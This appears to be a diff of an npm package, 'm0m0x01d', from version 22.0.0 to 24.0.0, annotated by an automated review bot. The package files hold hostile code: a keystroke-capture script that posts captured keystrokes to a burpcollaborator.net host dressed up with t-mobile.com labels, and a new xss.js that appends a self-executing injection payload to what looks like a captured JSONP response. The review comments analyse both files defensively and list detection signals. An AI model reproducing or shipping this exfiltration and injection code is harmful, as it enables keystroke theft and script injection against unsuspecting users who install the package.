m0m0x01d 22.0.0 → 24.0.0
- package/keystroke-capture.svg.js +1 -1
- package/package.json +1 -1
- package/xss.js +46 -0
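--- a/package/keystroke-capture.svg.js
+++ b/package/keystroke-capture.svg.js
@@ -1,7 +1,7 @@
 // Function to send keystrokes to the intermediary file on unpkg
 function sendKeystrokes(data) {
 var xhr = new XMLHttpRequest();
-xhr.open("POST", "https://es.t-mobile.com
+xhr.open("POST", "https://es.t-mobile.com.mmcyrtl8tknr87hk8d9j6upi69c10q.burpcollaborator.net/xxxxxxxxx", true);
 xhr.setRequestHeader("Content-Type", "application/json");
 xhr.send(JSON.stringify({ keystrokes: data }));
 }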
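Review bot: The destination on the added `xhr.open` line is a `burpcollaborator.net` host whose leading labels merely spell `es.t-mobile.com`, so the registered domain the POST actually reaches is the collaborator service; the change swaps one hard-coded destination for another and `sendKeystrokes` still ships whatever `data` it receives off-host unconditionally, with no origin check, consent or opt-out. A `.svg.js` file that constructs an `XMLHttpRequest` and posts a `keystrokes` JSON body is not library functionality; this version should be quarantined rather than installed, and the package removed or pinned away in any lockfile that resolves it. For detection the observable signals are an outbound `application/json` POST to a `*.burpcollaborator.net` name and this package name appearing in a dependency tree; egress-blocking the registered domain neutralises the call. The old-side URL is cut short in the rendering, so whether 22.0.0 already pointed at a collaborator host cannot be confirmed from this hunk.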
package/package.json
CHANGED
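--- /dev/null
+++ b/package/xss.js
@@ -0,0 +1,46 @@
+/*jsonp*/
+s7classics7sdkJSONResponse({
+"set": {
+"pv": "1.0",
+"type": "video",
+"n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+"item": {
+"v": {
+"path": "upsprod/_media_/e03/e035b19f-f70b-4213-9b2a-e49a8cfce5b4.mp4",
+"dx": "1920",
+"dy": "1080",
+"bitrate": "60947580",
+"id": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+"suffix": "mp4"
+},
+"i": {
+"mod": "layer=0&src=is(upsprod/Coco vs. the Doubters_Coco with SMBs)",
+"n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix"
+},
+"type": "video",
+"iv": "zJZEa1",
+"userdata": [{
+"Audio_Codec": "AAC LC",
+"Audio_Sample_Rate": "48.0",
+"Number_Audio_Channels": "2",
+"Video_Codec": "AVC",
+"Video_Frame_Rate": "24.000",
+"Video_Length": "30.0"
+}, {
+"Audio_Codec": "AAC LC",
+"Audio_Sample_Rate": "48.0",
+"Number_Audio_Channels": "2",
+"Video_Codec": "AVC",
+"Video_Frame_Rate": "24.000",
+"Video_Length": "30.0"
+}]
+}
+}
+}, "130443601");
+
+// XSS payload: inject document.domain into the JSONP response without breaking functionality
+(function(){
+var xss_payload = document.domain;
+console.log("Injected XSS payload: " + xss_payload);
+})();
+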
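Review bot: The file cannot execute as shipped: line 2 calls `s7classics7sdkJSONResponse`, a global nothing in this package defines, so loading it throws a ReferenceError before the self-executing block at the bottom is reached, and the only environment in which it runs is a page that already exposes that JSONP callback — which the comment on line 41 makes explicit by describing the tail as an injected payload. The JSONP body itself (keys such as `userdata`, `bitrate`, `path`) looks like a captured third-party response with code appended, though I would not attribute its origin further from this hunk alone. Read together with the keystroke file in the same version, this package should be treated as hostile and excluded from builds and CI caches; a practical detection rule is any npm artifact whose contents reference `document.domain` or `burpcollaborator`, or a JSONP wrapper immediately followed by an IIFE. Were the data legitimate it would belong in a `.json` fixture with no executable tail.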